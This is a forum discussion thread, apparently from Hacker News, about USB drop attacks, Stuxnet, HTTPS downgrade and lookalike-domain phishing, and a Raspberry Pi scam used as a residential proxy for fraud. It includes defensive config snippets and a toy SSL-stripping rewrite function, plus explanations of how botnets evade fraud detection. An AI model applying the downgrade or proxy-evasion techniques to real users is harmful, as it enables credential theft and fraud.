Yeah, it irks me that this is seen as a "stupid users" problem when our OSes are programmed to automatically execute code on a USB stick. I don't think the users are the stupid ones in this scenario.

> If you plug something into a centOS machine it’s not going to be able to do anything until you mount it ...

You may want to double check your CentOS desktop's defaults (you might be surprised).

My most critical machines have a file named /etc/modprobe.d/disabled.conf with entries such as these for dozens of filesystems, network protocols, and such:

  install usb-storage /bin/false
  install vfat /bin/false
When absolutely required, they can quickly be temporarily commented out (but not by mistake) and there's some very extensive auditing rules that keep an eye on things at that point.

It's really not that hard to lock a machine down and yet still have it actually remain usable. With the exceptions of the few security-focused distributions (Qubes OS, Tails, etc.), I can't think of any Linux distribution / desktop environment that even comes remotely close to doing anything like that (OOTB) by default, though.
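The "extensive auditing rules" part can be approximated with auditd. Rules along these lines (the watched file name matches the parent comment's; the key names are made up) log any tampering with the blacklist and any module load while it is relaxed:

```
# /etc/audit/rules.d/usb-lockdown.rules (sketch)
# Watch the modprobe blacklist for writes and attribute changes
-w /etc/modprobe.d/disabled.conf -p wa -k modprobe-blacklist
# Log every kernel module load (x86-64 syscalls)
-a always,exit -F arch=b64 -S init_module -S finit_module -k module-load
```

Afterwards, `ausearch -k module-load` would show exactly when the usb-storage module was actually loaded.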

Proof of concept: https://samy.pl/poisontap/

Reading through the sequence of what that does... nasty piece of work that. And kind of brilliant.

...because there are still bugs being found in the USB handling code that can occasionally be exploited for code execution.

A lot of IT security teams do this. On one side it is depressing, but on another side it is annoying to have to hear them talk about it every staff meeting. All companies seem to have people with zero understanding of computers and will fall for anything. I wonder how effective the education is. I guess if it prevents one attack it can pay for itself.

> it is annoying to have to hear them talk about it every staff meeting

Aren't you shooting the messenger?

Only a little bit. Most IT CyberSecurity teams can use bad stats to justify their value and additional staff, so they want to bring it up at every opportunity.

I don't necessarily disagree, but power users often get frustrated by red tape applied to everyone and not just those who consistently misuse their computer privileges.

I was at a financial software firm that dealt with USB security issues by filling the USB sockets with epoxy. The keyboard and mouse could not be removed from their USB sockets as they were held in place with a metal collar bolted to the case.

Simple and effective, although it destroyed any resale value of the PCs.

Do businesses (other than super small startups) actually sell their old hardware? Genuinely curious.

In my company (Fortune 500), we get new notebooks every 3 years and IT persistently pesters owners of old notebooks to return them. Given the sheer number of devices, I can imagine a reselling contract to be a nice additional source of income.

In this company's case the PCs were the cheapest of the cheap. Bottom end Dell and HP stuff.

When they were life-expired they were given over to a recycling company, who I assume would take the time to pick the epoxy out of the USB sockets, or probably just replace them. I think buying new USB sockets and connecting ribbons to the motherboards is probably quite cheap these days.

In the US, above a certain size you're basically required to sell off the old hardware because throwing it away counts as polluting, and the people who dispose of exclusively tech stuff charge you for that service.

Yep, look on eBay for sellers that specialize in refurbishing them. It's a great way to get something like an older Thinkpad for really cheap. Perfect for a Linux laptop that doesn't need the latest and greatest.

That's shocking. I know people are dopey, but 50%? I'd have guessed 20% at most.

Never underestimate the distribution of stupid. I worked at a hardware / software company where management distributed USB drives as a reward for something or other. The USB drives weren't even in blister packs; they were just loose in plastic envelopes. I threw mine out and wrote a complaint.

Companies routinely distribute software/presentations/etc. on USB drives. I suppose it's poor security hygiene these days but it's still routine.

Especially when stupid is an observable attribute in the industry.

Time and time again the technology industry has failed to consider security as a serious issue, never mind develop systems that are robust and transparent.

We don't have botnets, booby-trapped mail attachments, script-hackable servers, USB drives that can carry a viral payload, and all the rest because users are stupid, but because the industry's default culture is to think of security as an esoteric side issue, and not a non-negotiable critical feature in all IT systems.

More specifically, they tend to view it as a cost center that does nothing to increase profits.

Thing #1 to remember if you're in infosec is that you must pitch it based on the money saved by not having expensive problems like having to hire outside consultants and auditors after a breach.

I would guess that some people may try more than one; or, if there are lots of people and few thumb drives, given enough time someone more gullible will try them.

This is how stuxnet got into the Natanz facility I think. They left a usb stick in the parking lot. Someone picked it up, plugged it in.

No, iirc stuxnet spread itself without anyone physically leaving a USB stick anywhere. On a system infected via the network, it would try to infect any USB drives connected to the system.

Stuxnet is fascinating. Still, as far as I can tell, the most complex, interesting malware ever found in the wild. I believe it's unclear how stuxnet found its way into the enrichment facilities.

It did contain a USB device exploit delivering a dropper with a completely separate payload specifically targeted at the Natanz facility. A compromised USB device picked up in the parking lot would do the trick, but there are certainly other ways to get something through the front door and that information is unlikely to be public knowledge any time soon.

I do remember reading about that. It exploited a bug in windows to load an executable when the usb was plugged in. It then installed a usermode rootkit and hid its files.

I likely got the "parking lot" impression from Alex Gibney's Zero Days, but it's been a few years since that came out.

It probably got in via usb in the parking lot, but there hasn't been an official statement that I know of. It was confirmed that the hack into the DHS intranet was done by USB stick in the parking lot.

Natanz was air-gapped. Stuxnet penetrated the facility on a physical device; once inside, it spread over the LAN. The widespread distribution of it on the open Internet was because of a bug in the code.

> The Widespread distribution of it on the open Internet was because of a bug in the code.

It's presumed that the Israelis got a little bit greedy and, even though it was doing its job, tried to make the virus do its job a little better. They made it more virulent, which made it spread outside of the systems it was targeted at.

My understanding is that stuxnet got out of Natanz, by mistake. The world was never supposed to see that code. It was planted inside the Natanz secure perimeter.

Well, certain versions of stuxnet were sent to Natanz suppliers first, and I believe the infection made it out into the world from one of these suppliers, not Natanz itself.

If you lack physical access to the parking lot, the classy way to launch your cyber attack is by miniature trebuchet.

This is why, as much as I hate it most of the time, it's a good idea not to give your devs access to your network setup. If you're a small shop, limit the access as much as reasonably possible.

Emphasis on reasonable. If you limit workers' access too much for them to do their jobs they will find creative workarounds. Some of those can be more dangerous than just giving them the access that they need in a way that you control. Examples being if you make it so that the only way developers can debug a system is by adding in backdoors, or if you lock down the network so much that they need to use an unsecured public network to do their work. I've seen those things happen. Developers and IT need to work together, not be adversaries.

> Developers and IT need to work together, not be adversaries.


In the days when USB sticks were more common it was an easy tactic for someone to drop one in a company parking lot labeled “salary data” and with almost certainty that thing would get plugged into a device on the corporate network. The biggest security vulnerability in most cases is still users doing dumb things.

USB sticks are still pretty common.

As are USB stick attacks.


Oh, please, no-one would fall for that! FY2018_salary_data.xls.exe, on the other hand... :P

It wasn't uncommon to see hot_new_song.mp3.exe back in the gnutella heyday.

It's still reasonably common to see hot_new_movie.mp4.exe or have an encrypted mp4 with a install_this_codec.exe beside it.

I made that mistake once when I was a teen. My father was not pleased one bit.

Hidden file extension by default, so users are left wondering "hey why does this song end in .mp3"

Or even hot_new_song.mp3{lots_of_whitespace}.exe
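The double-extension trick works because a file manager hiding "known" extensions strips only the final suffix from the display name. A quick sketch of the mismatch in Python:

```python
# With extensions hidden, the user sees the stem; the OS executes the suffix.
from pathlib import Path

name = "hot_new_song.mp3.exe"
print(Path(name).suffix)  # '.exe' -- what actually runs on double-click
print(Path(name).stem)    # 'hot_new_song.mp3' -- what the user sees
```

The whitespace-padding variant pushes the real ".exe" off the visible edge of the filename column for the same effect.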

Have USB sticks stopped being common...? I'd guess there are a dozen or two around my house right now.

Many people have started using cloud services for private file sharing. But corporations often ban their use, so employees resort to USB devices.

That's weird, given how USB devices are also often banned so people resort to using online services. I implore people to prefer Airdrop, as it's an encrypted peer-to-peer system. Slack is the easy option, but it's a US based corporation. If you'd pass customer data through Slack you'd already be in violation of local laws.

I don't see how this 'man' in the middle could actually intercept passwords, except over HTTP, but who runs auth over HTTP anyway? For HTTPS, the 'man' would have to substitute its own certificate, and then the browser / client software wouldn't trust the cert/domain combination without the end user being extremely stupid (and knowledgeable enough to achieve the stupidity).

It could use something like bdfproxy[1] to intercept HTTP-downloaded EXE files, then add some persistent malware in _addition_ to whatever the EXE was doing. This has been done before, over Tor[2].

The malware doesn't have to add a new root certificate, either, though that's completely possible. The Zeus trojan [3] does "man-in-the-browser" to intercept banking information, for example.

[1] https://github.com/secretsquirrel/BDFProxy

[2] https://www.pcworld.com/article/2839152/tor-project-flags-ru...

[3] https://en.wikipedia.org/wiki/Zeus_(malware)

so the spoofer distributing these devices is going to all this trouble/expense/risk in the hope there is a http downloaded exe it can corrupt, then hopes the hashing doesn't fail on that corrupt exe, and hopes the user ignores the untrusted source warning so that it can install a trojan?

How many users do you know of who manually check hashes on downloaded executables?

And of course the user is going to ignore the untrusted source warning on an executable they intentionally downloaded and are trying to run.

I think what he means is that it seems like a lot of trouble to hack someone who is not necessarily hackworthy? Like what kind of things would you expect to gain from someone who would be as computer illiterate as to allow all that to come to fruition?

I agree that $25 / month is more than the average bot is generating. That said, there's a lot of value to many people's computers if properly exploited: https://krebsonsecurity.com/2012/10/the-scrap-value-of-a-hac...

I work at a software company. You would be amazed how many manager types earning six figures are absolutely naive with regard to security. Those are prime targets for this kind of exploit.

You only have to set this up once, then flash it to each device you're sending out.

These are the same users who connected an untrusted block of hardware directly to their router and presumably gave them their Facebook login and password.

If you download putty, it comes from an http link. Try it right now

It's ironic given that putty's entire purpose is for dealing with a securely encrypted protocol.

SSL stripping perhaps? There are still plenty of sites that don't implement HSTS, and not all users are vigilant enough to notice when the site they're visiting suddenly doesn't have HTTPS anymore.

Web security has been improving a lot in recent years, but it's not yet at the point where a man in the middle isn't a relevant threat.
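For a sense of how little machinery "stripping" takes, here is a toy sketch (not the actual sslstrip tool) of the rewrite step an in-path attacker performs: it speaks HTTPS to the real site and hands the victim a plain-HTTP copy with the secure links rewritten. The hostname is made up.

```python
def strip_https_links(html: str) -> str:
    """Naive sslstrip-style rewrite: downgrade every HTTPS link so the
    victim's browser keeps talking plain HTTP to the attacker."""
    return html.replace("https://", "http://")

page = '<a href="https://yourbank.example/login">Log in</a>'
print(strip_https_links(page))  # the padlock never appears for the victim
```

HSTS exists precisely to defeat this, which is why sites that don't send it remain the soft targets.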

You type in http://yourbank.com, your bank responds with a 301 to https, but this helpful router instead takes you to its phishing site. Lots of people wouldn't notice.

Or it redirects you to https:// yöurbank .com/, and you see the green padlock and think nothing more of it.

Edit: made HN not mangle the link.
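What the browser actually puts on the wire (and what a certificate would be issued for) is the Punycode form of such a lookalike, which is simply a different domain. A quick check with Python's built-in IDNA codec, using "yöurbank.com" as the hypothetical lookalike:

```python
lookalike = "yöurbank.com"

# Internationalized domain names travel in their ASCII "xn--" Punycode form.
wire_name = lookalike.encode("idna").decode("ascii")
print(wire_name)                    # an xn--...-prefixed name ending in .com
print(wire_name == "yourbank.com")  # False: a different domain entirely
```

So the attacker can get a perfectly valid DV certificate and a green padlock; nothing in the TLS machinery is being broken.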

I’d like to know which CA would issue an EV cert for a site like that - so I can remove them from my cert stores.

CAs are fully automated; they won't review or check for phishing lookalikes. Maybe reactively if it's been reported, but should they operate as the internet police? What if it's a legitimate bank that has the same name (with an accent) and isn't beholden to the same trademark in its country?

EV can't be (shouldn't be) fully automated, but:

+ It may seem like it is if your organisation gets a bunch of EV certs with the same organisation info under some bulk deal. The issuer only does the expensive manual EV steps once per period, if you're Google in January then (the thinking goes) you are still Google in June. This saves them money so it enables them to offer pretty good deals for lots of EV certs.

+ Good EV providers streamline the manual stuff in countries like the US that have their government records online. A call centre employee can do the searches, pull up contact details and phone your Head Office or whoever to confirm in minutes not hours. However this also means they won't necessarily pick up on subtle clues like why is this outfit named Myba N K ? Oh! That's My Bank but with misleading capitalisation and spacing.

+ White hats toying with EV discovered that outfits like D&B relied on in the business community to verify identity are... Not very reliable. If D&B says the Head Office is at 632 Wall Street that might be because somebody filled out a web form, not because D&B agents even checked 632 Wall Street exists let alone that the company has offices there...

What about DNS spoofing[1] at the local network level?

[1] https://en.wikipedia.org/wiki/DNS_spoofing

The spoofer wouldn’t be able to obtain a valid certificate for the spoofed site, though.

The spoofer can obtain a valid certificate for another, seemingly legitimate site. Any software that hasn't explicitly pinned the leaf TLS certificates will still accept the (valid) certificate it is redirected to.

And sadly, a lot of software still doesn't perform certificate pinning.

How is this redirect performed?

When a URL is manually typed in, and HSTS or HSTS-preloading isn't enabled, the initial 301 redirect would be http.
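The gap being described is that HSTS only protects after the browser has learned about it; the very first plain-HTTP request is fair game. A minimal hand-rolled sketch of the browser-side logic (not any real browser's code, and the preload list is omitted):

```python
hsts_hosts = set()  # hosts we've seen a Strict-Transport-Security header from

def record_response(host: str, headers: dict) -> None:
    # Remember hosts that opt in to HSTS.
    if any(k.lower() == "strict-transport-security" for k in headers):
        hsts_hosts.add(host)

def scheme_for_typed_url(host: str) -> str:
    # A bare "yourbank.com" in the address bar defaults to http
    # unless the host is in the HSTS set.
    return "https" if host in hsts_hosts else "http"

print(scheme_for_typed_url("yourbank.com"))  # 'http' -- interceptable
record_response("yourbank.com",
                {"Strict-Transport-Security": "max-age=31536000"})
print(scheme_for_typed_url("yourbank.com"))  # 'https' from now on
```

Preloading closes the first-visit hole, which is why it matters that so many sites still don't enable it.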

It could just be a 3xx redirect over clear http, right? The http site can redirect to a https site with a similar name.

It might redirect to a malicious web page, but HTTPS would still prevent a problem. Perhaps read the article you posted.

Only if they are serving HTTPS or HTTPS is pinned. Otherwise, aren't you relying on the user noticing the lack of HTTPS (which I wouldn't want to do)?

The user can just be redirected to another similar looking site with a valid TLS certificate.



This will seem like a valid website, especially if the phishing site is done well. Not just non-technical users, I'd wager some tech familiar users would be fooled too.

The focus always being on the lock icon might not always cover it.

Safari will prevent this though.

Isn't that why browsers visually distinguish the TLD and the part before it from the rest of the URL?

SSL/TLS downgrade attack when HSTS is not enabled.

What are the odds that someone dumb enough to install this would be scared off by an insecure site warning?

I think Chrome for a while has simply refused to let you visit a page when there's an SSL problem (at least for certain types of problems), which seems like a reasonable solution to the "people will just ignore warnings" problem.

Whilst it's certainly a scam to do with advertising [0], it doesn't look like there's any evidence that the scam has anything to do with 'stealing' anything from the network / network traffic:

> Facebook has several mechanisms in place to protect your account. We make every attempt to work within the these constraints. In order to keep your account from being locked we use a small device called a Raspberry Pi. This device allows us to connect to Facebook advertising APIs from your home network and avoids the hassle of your account being locked due to unfamiliar activity. Learn more about the Raspberry Pi below.

[0] https://www.reddit.com/r/Scams/comments/2vd1g8/scam_rentyour...

I find these claims extremely dubious. Everything they claim the Pi is needed for can be accomplished without the equipment and postage costs with a purely software solution; The hardware allows them to monitor all traffic and avoid antivirus/firewalls. Moreover, I doubt it is difficult to find mass-market Facebook accounts for much less than $15/month - it is far more likely that, given the hardware allows them unfettered access to all network traffic, it is designed to report back as much data as possible, ideally including plaintext passwords and banking information.

In this case, having a distributed botnet of Pis at people's houses would make sure you didn't get IP blocked by Facebook, since there are also legitimate users at that IP. Facebook probably would not block it, and even if it did unplugging and plugging back in the modem is enough for most residential gateways to get a new external IP.

The hardware gives a better guarantee of botnet uptime though. If you want it to be powered on and attached to that network 24/7, you can't rely on their laptop/desktop.

>Why do you need my account? Why not use your own? We have plenty of our own accounts. We need you because no matter how many accounts we have internally, Facebook limits the amount we can spend per account. By working with people like you, we are able to scale our business.

Can somebody explain if this makes sense? Why are there limits on account spending?

Because the ad spends are fraudulent in nature? Just a guess.

No, but if you accept the answer, you get $15.

probably using stolen CC's to buy ads

Look lower down that thread for the FAQ from the company: they're using the roommate's Facebook account to purchase targeted ads on Facebook in order to evade Facebook's internal controls. https://www.reddit.com/r/Scams/comments/2vd1g8/scam_rentyour...

The first comment in the thread you link to says the Raspberry Pi connects to botnets and records all network traffic.

> It records EVERY KEYSTROKE sent of the network, even SSL connection.

One wonders how it does that.

A microphone and some basic ML?

Sort of tongue in cheek, since I don't know the range of state of the art acoustic side-channel taps. I guess you'd also probably have power fluctuations and network timing channels to exploit.

Plus, a lot of different points at which to attempt to insert a second stage into the connected devices themselves, using all the tricks everyone else in this thread has mentioned.

I think that just means it records everything sent over the network.

I wish he would not destroy it and send to a security researcher to identify what it really does and what information is collected.

If I had to guess, it's providing VPN endpoint/relay services to scammers (CC fraud, etc) who need actual residential IPs to buy things from. Or to use to set up accounts/sockpuppet accounts for things like automated reddit vote manipulation.

It's obviously located "inside" the residential end user's router/NAT, on their wifi, so it'll have something like an openvpn or ipsec daemon on it that initiates a connection to an endpoint elsewhere on the internet, building a tunnel for the botnet operators to control it remotely. Or via tor to a tor hidden service somewhere, like many purely software trojan botnets for win32/win64, but in this case it will have the vpn or tor binaries running on its own dedicated raspberry-pi class device.

If you have a botnet of several thousand devices which can be made to look indistinguishable from legitimate "ordinary non technical user sitting at home on their comcast connection with their laptop or tablet", you can do all sorts of things. Relay http/https traffic for a click farm in Bangladesh where people are upvoting reddit comments en masse to promote a product, sockpuppet facebook account comments for political campaigns and pushing political agendas (russian internet research agency, anyone?), etc. The goal here is to make the traffic look like legit single end user residential internet traffic and not traffic that's coming from netblocks of major colocation/dedicated server/VPS/VM hosting companies, whose ARIN/RIPE/APNIC space is all documented as such.

There's fraud detection systems which will trigger if you're trying to buy something like amazon gift cards from a /20 netblock of an ISP in Bulgaria, but are less "suspicious" if your traffic and useragent, etc, are all coming from a Frontier, Centurylink, Comcast etc netblock in a major American city. Stuff like the maxmind geolocation data correlating closely with the billing zipcode/shipping zip code of what you're trying to buy with a stolen credit card, or other identify theft type scams.

If you're doing some variation on a massive vote manipulation service, there's also fraud/botnet detection systems which will trigger on large volumes of upvotes (or similar manipulation) all coming from the same geographical location and netblocks. Your traffic look more like legitimate end users if it is geographically distributed across many states and provinces, many english-speaking countries (AU, NZ, CA, UK, etc), and across many ISPs and several different common end user browser useragents (edge, chrome, firefox, etc). Imagine if you threw 500 darts at a map of the USA on a wall and distributed all your botnet devices randomly around the map, vs having 300 devices all on the same network in the Chicago metro area, for instance.

There are companies out there that offer proxies from 'real' US resident IP addresses. I think these companies use tactics like this to be able to offer real residential IPs (and not IP ranges belonging to hosting companies)

This is the first one that came up on google - https://stormproxies.com/ - I'm not saying that specific company is in any way related to this device or tactic (it is just the first on google for 'residential address ip proxy'), but I think it is companies similar to this that will pay people for access to their routers and sell that access.

What I find noteworthy about that stormproxies website is that unlike any sort of legit ISP, there's no information on what company is actually behind it, phone number, mailing address/street address, etc. I bet if you played follow the money with its credit card payments the money goes to a bank account in Cyprus or something.

It's a slick html template and some marketing text masquerading in front of a service obviously sold to greyhat/blackhat end users.

(perspective: I work for a legit ISP that has real things that physically exist in many POPs at layer 1 in the OSI model).

Luminati.io merely uses the Hola extension to power a massive residential IP network. Hardware is so 2000.

They've gone well beyond the extension now. These days you have no idea if that "free" app you've installed has made a deal with Luminati to sell your bandwidth to the highest bidder. They also have an Android SDK too. I've received several emails like the following:

> My name is Lior and I lead the SDK partnerships at Luminati.​ I assume your

> software earns money by charging users for a premium subscription or by showing

> ads - both models do not pay out much and harm the user experience.


> We now offer you a third option.


> Luminati’s monetization SDK for Windows desktop provides your users the option

> to use the software for free, and in exchange we pay you $30,000 USD per month,

> for every 1M daily active users.

> More information is available on http://luminati.io/sdk_win.

That is sketchy and unethical as fuck.

I would like to give them an A+ rating for whatever graphic artist drew their artwork and did the CSS/webpage layout, however.

I dunno, to me the icon is reminiscent of the Hades character from the Disney movie: https://vignette.wikia.nocookie.net/disney/images/c/cf/Hercu...

3 cents per user per month. Is that right?

Is it hard to make 3 cents a month from a user?

3 cents more than what you were making before. It's free money

This is honestly a pretty neat idea. Don't get me wrong, it's sketchy as hell and I'm sure gets abused, but residential proxies... well played.

The other big player is Hola.

This is almost certainly the right answer.
